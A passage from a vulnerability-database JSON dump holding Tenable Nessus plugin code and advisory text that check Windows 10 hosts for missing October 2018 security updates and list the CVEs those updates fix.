script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8713dae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4462917.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8494\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows NtUserSetWindowFNID Win32k User Callback');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-10\";\nkbs = make_list('4462917');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"10_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4462917])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:16:31", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4462922.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489, CVE-2018-8490)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_OCT_4462922.NASL", "href": "https://www.tenable.com/plugins/nessus/118000", "published": "2018-10-09T00:00:00", "title": "KB4462922: Windows 10 October 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118000);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\n \"CVE-2018-8330\",\n \"CVE-2018-8333\",\n \"CVE-2018-8411\",\n \"CVE-2018-8413\",\n \"CVE-2018-8423\",\n \"CVE-2018-8453\",\n \"CVE-2018-8460\",\n \"CVE-2018-8472\",\n \"CVE-2018-8481\",\n \"CVE-2018-8482\",\n \"CVE-2018-8484\",\n \"CVE-2018-8486\",\n \"CVE-2018-8489\",\n \"CVE-2018-8490\",\n \"CVE-2018-8491\",\n \"CVE-2018-8493\",\n \"CVE-2018-8494\",\n \"CVE-2018-8503\"\n );\n script_bugtraq_id(105477);\n script_xref(name:\"MSKB\", value:\"4462922\");\n script_xref(name:\"MSFT\", value:\"MS18-4462922\");\n\n script_name(english:\"KB4462922: Windows 10 October 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4462922.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489, CVE-2018-8490)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)\");\n # https://support.microsoft.com/en-us/help/4462922/windows-10-update-kb4462922\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fbae3c83\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4462922.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8494\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows NtUserSetWindowFNID Win32k User Callback');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-10\";\nkbs = make_list('4462922');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"10_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4462922])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:16:31", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4462937.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2018-8512)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489, CVE-2018-8490)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8492)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - A remote code execution vulnerability exists when\n Windows Shell improperly handles URIs. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8495)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503, CVE-2018-8505)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8530)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2018-8497)", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_OCT_4462937.NASL", "href": "https://www.tenable.com/plugins/nessus/118004", "published": "2018-10-09T00:00:00", "title": "KB4462937: Windows 10 Version 1703 October 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118004);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\n \"CVE-2018-8330\",\n \"CVE-2018-8333\",\n \"CVE-2018-8411\",\n \"CVE-2018-8413\",\n \"CVE-2018-8423\",\n \"CVE-2018-8453\",\n \"CVE-2018-8460\",\n \"CVE-2018-8472\",\n \"CVE-2018-8481\",\n \"CVE-2018-8482\",\n \"CVE-2018-8484\",\n \"CVE-2018-8486\",\n \"CVE-2018-8489\",\n \"CVE-2018-8490\",\n \"CVE-2018-8491\",\n \"CVE-2018-8492\",\n \"CVE-2018-8493\",\n \"CVE-2018-8494\",\n \"CVE-2018-8495\",\n \"CVE-2018-8497\",\n \"CVE-2018-8503\",\n \"CVE-2018-8505\",\n \"CVE-2018-8512\",\n \"CVE-2018-8530\"\n );\n script_bugtraq_id(105477, 105478);\n script_xref(name:\"MSKB\", value:\"4462937\");\n script_xref(name:\"MSFT\", value:\"MS18-4462937\");\n\n script_name(english:\"KB4462937: Windows 10 Version 1703 October 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4462937.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2018-8512)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489, CVE-2018-8490)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8492)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - A remote code execution vulnerability exists when\n Windows Shell improperly handles URIs. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8495)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503, CVE-2018-8505)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8530)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2018-8497)\");\n # https://support.microsoft.com/en-us/help/4462937/windows-10-update-kb4462937\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?035901c3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4462937.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8494\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows NtUserSetWindowFNID Win32k User Callback');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n 